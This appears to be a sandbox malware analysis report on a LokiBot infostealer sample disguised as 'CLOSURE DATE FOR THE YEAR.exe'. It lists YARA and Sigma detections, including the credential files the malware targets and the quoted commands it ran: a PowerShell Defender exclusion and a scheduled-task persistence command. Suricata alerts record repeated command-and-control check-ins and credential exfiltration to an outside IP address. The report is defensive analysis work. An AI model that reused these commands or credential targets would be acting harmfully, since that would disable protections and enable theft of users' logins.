8.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ProcessId: 7732, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe, ParentImage: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe, ParentProcessId: 8056, ParentProcessName: IOsbBBIDAm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp", ProcessId: 7268, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", ProcessId: 7852, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ProcessId: 7732, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe", ParentImage: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe, ParentProcessId: 7480, ParentProcessName: CLOSURE DATE FOR THE YEAR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp", ProcessId: 7852, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:08.289516+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:10.175294+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49738	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:06.767642+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.41	80	TCP
2024-12-04T06:52:08.695716+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-12-04T06:52:10.478754+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:12.295749+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:14.164338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:15.938259+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:17.657827+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:19.405358+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:21.262165+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:23.073188+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:24.932098+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:26.793786+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:28.638241+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:30.565483+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:32.892280+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:34.734954+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:36.409350+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:38.347814+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:40.197879+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:42.088177+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:44.074154+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:45.927567+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:47.828393+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:49.779959+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:51.635755+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:53.344478+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:55.009703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:56.900865+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:52:58.761872+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:00.620039+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:02.477302+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:04.401220+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:06.095984+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:07.851506+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:09.713035+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:11.637327+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:13.370849+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:15.244855+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:17.057306+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:18.965518+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:20.841367+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:22.493732+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:24.369185+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:26.229898+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:28.109936+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:29.804559+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:31.659622+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:33.543135+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:35.720159+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:37.417338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:39.230433+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:41.090316+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:42.933722+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:44.792352+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:46.706490+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49912	94.156.177.41	80	TCP
2024-12-04T06:53:48.570673+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49916	94.156.177.41	80	TCP
2024-12-04T06:53:50.433426+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49920	94.156.177.41	80	TCP
2024-12-04T06:53:52.290981+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49925	94.156.177.41	80	TCP
2024-12-04T06:53:54.163772+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49930	94.156.177.41	80	TCP
2024-12-04T06:53:55.922617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.41	80	TCP
2024-12-04T06:53:57.777455+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2024-12-04T06:53:59.620459+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49946	94.156.177.41	80	TCP
2024-12-04T06:54:01.491745+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:12.021642+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49739	TCP
2024-12-04T06:52:13.893779+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49740	TCP
2024-12-04T06:52:15.652893+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49741	TCP
2024-12-04T06:52:17.338561+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49743	TCP
2024-12-04T06:52:19.145796+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49746	TCP
2024-12-04T06:52:21.002459+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49750	TCP
2024-12-04T06:52:22.805215+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49752	TCP
2024-12-04T06:52:24.671843+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49754	TCP
2024-12-04T06:52:26.523527+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49756	TCP
2024-12-04T06:52:28.378825+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49757	TCP
2024-12-04T06:52:30.298016+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49759	TCP
2024-12-04T06:52:32.214744+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49761	TCP
2024-12-04T06:52:34.460893+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49762	TCP
2024-12-04T06:52:36.138567+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49764	TCP
2024-12-04T06:52:38.013205+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49766	TCP
2024-12-04T06:52:39.937959+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49767	TCP
2024-12-04T06:52:41.827201+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49768	TCP
2024-12-04T06:52:43.730471+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49769	TCP
2024-12-04T06:52:45.655216+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49770	TCP
2024-12-04T06:52:47.555548+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49771	TCP
2024-12-04T06:52:49.469198+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49772	TCP
2024-12-04T06:52:51.371174+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49773	TCP
2024-12-04T06:52:53.071414+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49774	TCP
2024-12-04T06:52:54.743376+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49775	TCP
2024-12-04T06:52:56.644483+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49776	TCP
2024-12-04T06:52:58.498303+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49778	TCP
2024-12-04T06:53:00.351213+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49780	TCP
2024-12-04T06:53:02.213689+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49786	TCP
2024-12-04T06:53:04.129571+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49792	TCP
2024-12-04T06:53:05.822697+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49793	TCP
2024-12-04T06:53:07.596717+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49799	TCP
2024-12-04T06:53:09.450203+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49805	TCP
2024-12-04T06:53:11.284231+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49811	TCP
2024-12-04T06:53:13.101166+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49816	TCP
2024-12-04T06:53:14.988014+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49818	TCP
2024-12-04T06:53:16.798129+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49824	TCP
2024-12-04T06:53:18.706548+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49829	TCP
2024-12-04T06:53:20.574452+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49834	TCP
2024-12-04T06:53:22.239334+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49841	TCP
2024-12-04T06:53:24.111122+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49845	TCP
2024-12-04T06:53:25.967804+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49850	TCP
2024-12-04T06:53:27.836168+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49855	TCP
2024-12-04T06:53:29.529651+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49861	TCP
2024-12-04T06:53:31.393432+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49866	TCP
2024-12-04T06:53:33.282610+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49871	TCP
2024-12-04T06:53:35.213127+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49875	TCP
2024-12-04T06:53:37.150752+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49881	TCP
2024-12-04T06:53:38.966714+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49886	TCP
2024-12-04T06:53:40.833744+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49891	TCP
2024-12-04T06:53:42.637349+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49896	TCP
2024-12-04T06:53:44.524266+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49902	TCP
2024-12-04T06:53:46.431533+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49906	TCP
2024-12-04T06:53:48.311015+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49912	TCP
2024-12-04T06:53:50.169203+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49916	TCP
2024-12-04T06:53:52.029213+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49920	TCP
2024-12-04T06:53:53.903102+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49925	TCP
2024-12-04T06:53:55.649895+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49930	TCP
2024-12-04T06:53:57.518639+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49936	TCP
2024-12-04T06:53:59.365409+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49941	TCP
2024-12-04T06:54:01.200593+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49946	TCP
2024-12-04T06:54:03.081113+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49950	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T06:52:11.901579+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-12-04T06:52:13.773578+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-12-04T06:52:15.532769+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-12-04T06:52:17.218226+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-12-04T06:52:19.025824+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2024-12-04T06:52:20.880675+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49750	94.156.177.41	80	TCP
2024-12-04T06:52:22.683187+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.41	80	TCP
2024-12-04T06:52:24.551833+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-12-04T06:52:26.403488+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-12-04T06:52:28.258701+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-12-04T06:52:30.177926+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-12-04T06:52:32.085852+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2024-12-04T06:52:34.340931+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-12-04T06:52:36.018358+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2024-12-04T06:52:37.879906+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2024-12-04T06:52:39.817896+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2024-12-04T06:52:41.707155+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-12-04T06:52:43.608002+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-12-04T06:52:45.535212+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2024-12-04T06:52:47.435569+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2024-12-04T06:52:49.349051+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2024-12-04T06:52:51.251091+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2024-12-04T06:52:52.949423+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2024-12-04T06:52:54.623292+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-12-04T06:52:56.524407+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2024-12-04T06:52:58.372095+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2024-12-04T06:53:00.231152+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2024-12-04T06:53:02.093707+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2024-12-04T06:53:04.009007+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49792	94.156.177.41	80	TCP
2024-12-04T06:53:05.702695+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.41	80	TCP
2024-12-04T06:53:07.476673+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.41	80	TCP
2024-12-04T06:53:09.330217+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.41	80	TCP
2024-12-04T06:53:11.164303+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.41	80	TCP
2024-12-04T06:53:12.980893+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49816	94.156.177.41	80	TCP
2024-12-04T06:53:14.868129+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.41	80	TCP
2024-12-04T06:53:16.678278+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49824	94.156.177.41	80	TCP
2024-12-04T06:53:18.586498+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49829	94.156.177.41	80	TCP
2024-12-04T06:53:20.454492+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-12-04T06:53:22.119370+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.41	80	TCP
2024-12-04T06:53:23.990954+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-12-04T06:53:25.847762+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49850	94.156.177.41	80	TCP
2024-12-04T06:53:27.716217+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.41	80	TCP
2024-12-04T06:53:29.409695+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49861	94.156.177.41	80	TCP
2024-12-04T06:53:31.273515+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49866	94.156.177.41	80	TCP
2024-12-04T06:53:33.162635+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.41	80	TCP
2024-12-04T06:53:35.093148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-12-04T06:53:37.030637+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49881	94.156.177.41	80	TCP
2024-12-04T06:53:38.846753+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49886	94.156.177.41	80	TCP
2024-12-04T06:53:40.713775+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49891	94.156.177.41	80	TCP
2024-12-04T06:53:42.517335+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49896	94.156.177.41	80	TCP
2024-12-04T06:53:44.404340+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-12-04T06:53:46.309965+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49906	94.156.177.41	80	TCP
2024-12-04T06:53:48.190933+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49912	94.156.177.41	80	TCP
